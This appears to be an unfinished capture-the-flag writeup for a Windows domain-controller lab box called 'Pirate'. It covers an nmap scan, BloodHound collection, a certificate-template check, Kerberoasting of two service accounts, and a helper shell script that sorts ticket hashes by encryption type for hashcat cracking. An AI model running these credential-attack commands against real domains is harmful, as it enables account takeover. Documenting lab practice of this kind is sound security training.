Myles Nieman

Pirate

Overview

Pirate is a hard Windows box exposing a domain controller (DC01.pirate.htb) together with a set of starting pentest credentials. The intended entry point appears to be the Active Directory environment itself: the notes cover initial BloodHound collection and Kerberoasting, but the Kerberoast hashes did not crack within the session documented here, so the path is incomplete.

Path (partial): pentest creds → BloodHound → Kerberoast ADM / A.WHITE SPNs → (crack) → …

Enumeration

The nmap scan confirms a Windows domain controller. Notable ports are DNS (53), HTTP/HTTPS (80/443), Kerberos (88) and kpasswd (464), MSRPC (135) and RPC over HTTP (593), LDAP and LDAPS including the global catalog (389/636/3268/3269), and SMB (139/445). The LDAPS certificate names the host DC01.pirate.htb in the pirate.htb domain, which also gives the hostnames to add to /etc/hosts before using Kerberos-based tooling.

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: pirate.htb)
443/tcp  open  https
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      (Domain: pirate.htb, commonName=DC01.pirate.htb)
3268/tcp open  ldap
3269/tcp open  ssl/ldap
Service Info: Host: DC01; OS: Windows

Nmap scan of pirate.htb DC01

The box comes with starting credentials:

pentest / p3nt3st2025!&

Enumeration — BloodHound Collection

With valid credentials, BloodHound collection runs via NetExec’s built-in --bloodhound module (the Python bloodhound.py collector failed to ingest properly):

$ nxc ldap 10.129.7.69 -u pentest -p 'p3nt3st2025!&' -d pirate.htb \
    --bloodhound --collection All \
    --dns-server 10.129.7.69 --kdcHost 10.129.7.69

Checking for vulnerable ADCS certificate templates turns up nothing:

$ certipy find -u 'pentest@pirate.htb' -p 'p3nt3st2025!&' \
    -dc-ip 10.129.7.69 -vulnerable -stdout

certipy output — no vulnerable certificate templates

BloodHound identifies two Kerberoastable accounts:

BloodHound showing two Kerberoastable users

Kerberoasting

Both Kerberoastable accounts are targeted. One of them appears to be ADM; BloodHound also suggests a possible secondary pivot to A.WHITE:

BloodHound path detail — ADM SPN and A.WHITE account

Requesting the service tickets:

$ GetUserSPNs.py pirate.htb/pentest:'p3nt3st2025!&' \
    -dc-ip 10.129.7.69 -request

GetUserSPNs output — tickets requested for Kerberoastable accounts

Offline cracking against standard wordlists did not recover the ADM hash.
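Before spending GPU time, it is worth checking which encryption type each requested ticket came back with, because the hashcat mode and the expected cracking speed differ sharply between RC4 and AES. The script below is an added example and is not part of the original writeup: it reads an impacket-style hash file (the format GetUserSPNs.py writes with -outputfile), splits the lines by etype, and prints a hashcat command per mode. The two hash lines embedded in demo() are constructed placeholders with fake hex, not tickets from pirate.htb, and the wordlist and rule paths are assumed Kali defaults.

```shell
#!/bin/sh
# Added example, not from the original writeup: triage Kerberoast hashes by
# encryption type so RC4 tickets (cheap to crack) are attacked first and AES
# tickets get the right hashcat mode instead of failing to load.
# The sample hashes in demo() are CONSTRUCTED placeholders, not real tickets.

# Print the hashcat mode for one $krb5tgs$ line; exit non-zero if unrecognised.
krb5tgs_mode() {
  case "$1" in
    '$krb5tgs$23$'*) echo 13100 ;;   # RC4-HMAC (etype 23): by far the fastest to crack
    '$krb5tgs$17$'*) echo 19600 ;;   # AES128-CTS-HMAC-SHA1-96 (etype 17)
    '$krb5tgs$18$'*) echo 19700 ;;   # AES256-CTS-HMAC-SHA1-96 (etype 18): slowest
    *) echo "unrecognised hash line" >&2; return 1 ;;
  esac
}

# Split a hash file into $2/hashes.<mode>, one file per hashcat mode.
# Prints each mode that received at least one hash, one per line, in order seen.
split_by_mode() {
  infile="$1"; outdir="$2"
  mkdir -p "$outdir"
  seen=""
  while IFS= read -r line || [ -n "$line" ]; do
    [ -z "$line" ] && continue
    mode=$(krb5tgs_mode "$line") || continue   # skip lines that are not $krb5tgs$
    printf '%s\n' "$line" >> "$outdir/hashes.$mode"
    case " $seen " in *" $mode "*) ;; *) seen="$seen $mode" ;; esac
  done < "$infile"
  for m in $seen; do echo "$m"; done
}

# Build (but do not run) the hashcat command for one mode: straight wordlist
# attack (-a 0) with rule-based mangling (-r) and optimized kernels (-O).
# Paths are assumed Kali defaults; override the wordlist with the third argument.
crack_cmd() {
  mode="$1"; hashfile="$2"; wordlist="${3:-/usr/share/wordlists/rockyou.txt}"
  printf 'hashcat -m %s -a 0 %s %s -r /usr/share/hashcat/rules/best64.rule -O\n' \
    "$mode" "$hashfile" "$wordlist"
}

# Demo on constructed input: one RC4 ticket for ADM, one AES256 ticket for A.WHITE.
demo() {
  tmp=$(mktemp -d)
  cat > "$tmp/spn_hashes.txt" <<'EOF'
$krb5tgs$23$*ADM$PIRATE.HTB$pirate.htb/ADM*$0123456789abcdef0123456789abcdef$00112233445566778899aabbccddeeff
$krb5tgs$18$A.WHITE$PIRATE.HTB$*pirate.htb/A.WHITE*$0123456789abcdef01234567$8899aabbccddeeff0011223344556677
EOF
  for mode in $(split_by_mode "$tmp/spn_hashes.txt" "$tmp/out"); do
    crack_cmd "$mode" "$tmp/out/hashes.$mode"
  done
  rm -rf "$tmp"
}
```

Run demo (or point split_by_mode at the real -outputfile) and the RC4 command comes out first; if every line turns out to be etype 17 or 18, the account is AES-only and a rockyou.txt run that finishes in minutes for RC4 will take hours or days, which is worth knowing before concluding the password is strong.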

Notes

Thin notes — the writeup ends at the Kerberoasting stage. The session ran out of steam after the ADM hash resisted rockyou.txt; no further pivots, credentials, or paths were documented. The full exploitation chain remains to be revisited.

Takeaways

  • Pre-supplied pentest credentials enable fast BloodHound collection — go straight to nxc ldap --bloodhound to avoid the Python collector’s ingest quirks.
  • Kerberoastable service accounts are only useful if the ticket cracks. A strong service-account password will resist rockyou.txt alone, so move to larger wordlists and rule-based mangling, and check the etype in each hash first: $krb5tgs$23$ is RC4 (hashcat 13100), while $krb5tgs$17$ and $krb5tgs$18$ are AES (19600/19700), which crack far more slowly and will not load under the RC4 mode.